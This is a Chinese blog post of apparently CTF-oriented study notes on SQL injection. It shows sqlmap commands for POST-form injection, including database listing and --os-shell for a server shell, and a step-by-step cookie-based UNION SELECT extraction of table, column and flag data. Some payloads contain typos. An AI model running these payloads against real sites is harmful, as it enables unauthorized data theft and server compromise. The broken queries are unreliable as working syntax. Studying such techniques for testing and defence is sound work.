SQL补充

于 2022-04-02 00:30:17 发布
阅读量3.7k 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zzzbr_/article/details/123910885
版权

1、POST型注入:两种方法,第一种利用burp抓包然后使用sqlmap -r 来进行检测注入
第二种比较简单,直接使用sqlmap --forms 这个参数就可以了。

第一种方式

1.1利用burp抓包,可以得出,提交的
userid=test
userpass=test
主要注入也是由这个表单而起
,那么把他放入一个txt文件中并放入sqlmap目录下。

即将这部分信息:

  1. POST /login.aspx HTTP/1.1
  2. Host: xxx.xxxxx.com
  3. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. Referer: [url]http://xxx.xxxxx.com/[/url]
  8. Cookie: ASP.NET_SessionId=2rslbt55ykuuntjvqwawax45
  9. Connection: close
  10. Content-Type: application/x-www-form-urlencoded
  11. Content-Length: 106
  13. __VIEWSTATE=%2FwEPDwUJLTMzMjAwMjk3ZGQRxhY3kgspLOxJLG8mggcuWQGyAA%3D%3D&userid=test&userpass=test&x=58&y=10

放入txt文件

1.2打开sqlmap,开始进行注入
命令:sqlmap.py -r post.txt

根据:

  • [INFO] the back-end DBMS is Microsoft SQL Server
  • web server operating system: Windows 2003 or XP
  • web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
  • back-end DBMS: Microsoft SQL Server 2008

可以得出,他是mssql 08 的数据库,xp03的服务器,iis为6.0 asp脚本
我们可以深入一下,例如先查看他的表

命令:sqlmap.py -r post --dbs

------得到表名

第二种方式

首先我们直接打开sqlmap,输入指令
命令:sqlmap.py -u "url" --forms

forms参数会自动抓取post包,从而进行注入。

发现这个post包跟burp抓取的一样
来深入一下
使用命令:sqlmap.py -u "url" --forms --os-shell

------进而继续爆破

2、Cookie注入

1.1使用burpsuit进行抓包,看到cookie一栏显示为id=1;

1.2此时修改id=1‘ 发现报错 说明存在注入

1.3修改id=1 order by 2;和id= order  by 3发现前者显示正常,说明读取到页面的字段数量为2

1.4此时修改id=-1 union select 1,2 发现页面返回正常,并且1,2可以正常显示

1.5此时插入代码,获得当前数据库名 (id=-1 union select (database()),2

1.6插入代码获得当前表名:id=-1 union select (select table_name from information_schema.tables where take_schema=database()limit0,1),2;

(尝试手打)

得到表名,譬如zzzzbr

1.7插入代码活到当前字段名:id=-1 union select (select column_name from information_schema.columns where table-scheam=database()limit0,1),2;

这里column意思有:专栏,列,栏,这里应为字段的意思(学一手英语)

得到字段名,譬如hlycxwryjzh

1.8合并得flag:(知道数据库比如是sqli)id=-1 union select(select hlycxwryjzh from sqli.zzzzbr limit 0,1),2;

SUMMARY:

post型注入和Cooike注入都需要利用burp抓包来进行下一步操作,目前所学的post型注入需要搭配sqlmap完成解题,而Cooike型在burp里进行,其爆库爆表爆字段,贴近于其他的几种注入方法,也能够更贴切的理解和学习sql注入的语句内容。

Zzzbr_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
意见建议SQL补充.sql
04-10
意见建议SQL补充.sql
乐优商城补充sql语句
02-24
乐优商城补充sql语句,含有tb_spec_group等
使用sql填充数据
我的的博客
12-02 2735
使用sql填充数据 1.创建表 create table test ( name string, activity string ) row format delimited fields terminated by '\t'; 2.构造数据 张三 吃饭 张三 张三 张三 王五 打豆豆 王五 王五 赵四 唱歌 赵四 赵四 赵四 赵四 赵四 赵四 3.处理思路 使用sum()over()开窗函数特性进行累积分组 将非空的数据筛选出来进行分组 将上两步的数据进行关联得到相应的数据
SQL语句补充
HelyD的博客
09-06 200
昨天写了sql语句的一些基本操作,今天来点升级版的 查询方式还有分页查询和多表查询等 首先分页查询: 有假分页(逻辑分页/内存分页)和真分页(物理分页/数据库分页) 假分页/逻辑分页/内存分页 一次性查询出所有的数据,存放到内存中(集合),每次翻页都是从内存中取出的指定的条数 特点:翻页很快,如果数据量很大,可能会造成内存溢出 真分页/物理分页/数据库分页 每次翻页都是从数...
sqlmap的常用tamper脚本
浅笑996的博客
11-02 3035
sqlmap下的tamper目录存放绕过WAF脚本 使用方法 --tamper 脚本名称,脚本名称 多个tamper脚本之间用空格隔开 apostrophemask.py 用utf8代替引号 equaltolike.py like代替等号 space2dash.py 绕过过滤‘=...
CHIL-SQL-快速参考
FWT632809030的博客
02-22 123
SQL 语句 语句语法 AND / OR SELECT column_name(s) FROM table_name WHERE condition AND|OR condition ALTER TABLE (add column) ALTER TABLE table_name ADD column_name datatype ALTER TABL...
sqlmap用户手册(七)——爆破等
从此寂寞的自留地
11-08 3689
爆破 暴力破解表名 参数:--common-tables 当使用--tables无法获取到数据库的表时,可以使用此参数。 通常是如下情况: 1、MySQL数据库版本小于5.0,没有information_schema表。 2、数据库是Microssoft Access,系统表MSysObjects是不可读的(默认)。 3、当前用户没有权限读取系统中保存数据结构的表的权
嵌入式SQL补充PPT学习教案.pptx
10-07
嵌入式SQL补充PPT学习教案.pptx
嵌入式SQL补充PPT教案学习.pptx
10-02
嵌入式SQL补充PPT教案学习.pptx
SQL补充触发器临时表与游标PPT学习教案.pptx
10-03
SQL补充触发器临时表与游标PPT学习教案.pptx
sqlmap的基本命令使用
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
sqlmap之(六)----POST登陆框注入实战
热门推荐
fendo
02-28 8万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,
渗透神器sqlmap的使用笔记
煜铭2011
04-14 8648
0x00前言 sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!! 下载地址:https://github.com/sqlmapproj...
sqlmap post注入
zhaozhanyong的专栏
11-19 5895
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
sqlmap命令详解
Pitbull2014的博客
12-20 1093
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap注入实例
~初出茅庐~ 的博客
10-16 1082
第一步: 安装Python, 安装完成将sqlmap文件夹解压放到C:\Python27\下面。 附件(Python2.7.1安装包+sqlmap包): https://download.csdn.net/download/qq_23306363/10724195 第二步: 1)win+R,输入cmd,输入 cd c:\ 进入c盘 2)确定网址:如"http://XXX" 3)输入...
【CTF】sqlmap之POST注入的两种方法(-r 和--data)
HAPPY
07-30 8253
sqlmap进行做post注入测试的时候,发现这么一种情况: 对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试; 发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。   故以上两种情况都是post的,却还是有区别的   故此记录如下: 1:POST注入时,什么时候用“-r txt文...
sqlmap的使用命令记录
馒 的技术空间
05-17 2367
最近新做的测评方案要做SQL注入检测,简单学习了下,记录一下。1、无需安装,直接上官网下载解压,用python运行就可以。2、测试是否存在注入点解压目录下命令行执行python sqlmap.py -u "http://192.168.1.150?id=111"由于没有详细看sqlmap的原理,部分靠猜测,url链接一定是有?后面带参数的,因为参数会作为注入点测试。因为一开始试了几个网站,没有成功...
Sqlmap命令使用
一醉一休的博客
02-27 4110
Sqlmap基本命令使用,总结常用23条命令
sql如何实现null由上面的值补充
最新发布
06-01
SQL中,可以使用COALESCE函数来实现将NULL值替换为其前面的非NULL值。COALESCE函数接受多个参数,并返回它们中的第一个非NULL值。因此,可以将COALESCE函数的第一个参数设置为需要替换NULL的列,而其余参数设置为该列之前的列,以便将NULL替换为上一个非NULL值。 例如,假设有一个名为“column”的列,其中包含NULL值。可以使用以下SQL语句将NULL替换为上一个非NULL值: ``` SELECT COALESCE(column, lag(column) OVER (ORDER BY <order_column>)) as column FROM <table_name> ``` 其中,`<order_column>`是用于排序的列,`<table_name>`是表名。使用`lag`函数来获取上一个非NULL值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值